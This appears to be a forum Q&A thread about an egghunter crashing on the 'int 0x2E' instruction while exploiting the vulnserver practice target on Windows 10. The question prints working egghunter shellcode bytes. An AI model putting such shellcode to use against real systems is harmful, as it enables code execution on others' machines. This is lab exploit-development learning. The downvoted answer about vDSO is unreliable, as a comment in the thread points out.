# Crash on "int 0x2E" instruction

Tags: exploit

While trying to exploit vulnserver (GMON), on Windows 10, using an egghunter, the program crashes in the instruction `int 0x2E` of the egghunter.
The exploit works if I use jumps.

Does someone know if there is any issue or protection with the `int 0x2E` and `int 0x80` instructions on Windows 10?

Egghunter code:

```
egghunter = ""
egghunter += "\x66\x81\xCA\xFF\x0F" # or dx, 0x0fff
egghunter += "\x42"                 # inc edx
egghunter += "\x52"                 # push edx
egghunter += "\x6A\x02"             # push 0x2
egghunter += "\x58"                 # pop eax
egghunter += "\xCD\x2E"             # int 0x2e
egghunter += "\x3C\x05"             # cmp al, 0x5
egghunter += "\x5A"                 # pop edx
egghunter += "\x74\xEF"             # jz 0x0
egghunter += "\xB8\x6e\x6f\x70\x65" # mov eax, 0x6e6f7065
egghunter += "\x8B\xFA"             # mov edi,edx
egghunter += "\xAF"                 # scasd
egghunter += "\x75\xEA"             # jnz 0x5
egghunter += "\xAF"                 # scasd
egghunter += "\x75\xE7"             # jnz 0x5
egghunter += "\xFF\xE7"             # jmp edi
```

Comment: Related: https://blog.amossys.fr/windows10_TH2_int2E_mystery.html

Answer (score 2, accepted):

You have to jump `int 0x2E`, because it only worked in older versions of Microsoft Windows. In 2009 this changed and this system call no longer works for modern operating systems, such as Windows 10.

references:

- [Hooking System Calls Through MSRs](https://resources.infosecinstitute.com/topic/hooking-system-calls-msrs/)
- [CSC 471/583 Advanced Topics in Computer Security Modern Malware Analysis
  Rootkit](https://www.cs.wcupa.edu/schen/malware2021/slides/ch09.pdf#page=16)
- [egghunter's author response to 0x2E](https://twitter.com/epakskape/status/1433814194609065986)

Answer (score -2):

Interrupts like `0x80` have been deemed 'too slow' for modern processors. The interrupt's *raison d'être* was a way to move between userland and kernelmode. In Linux, there is a newer method of doing that that is faster that uses SYSENTER and SYSEXIT instuctions and uses a VDSO - Virtual Dynamically linked Shared Object. This allows user processes to access kernel resources without sending an interrupt.

More detailed information can be found [at this write-up by Manu Garg](http://articles.manugarg.com/systemcallinlinux2_6.html)

I know your question is about Win10; have only been working with Linux in this area recently, so can only assume that there is a corresponding change in the Windows kernel. Hopefully this will give you a starting point!

Comment: -1 vDSO has nothing to do with sysenter or any real syscall (and actually modern systems use the syscall instruction, not sysenter). The vDSO specifically does not involve context switching.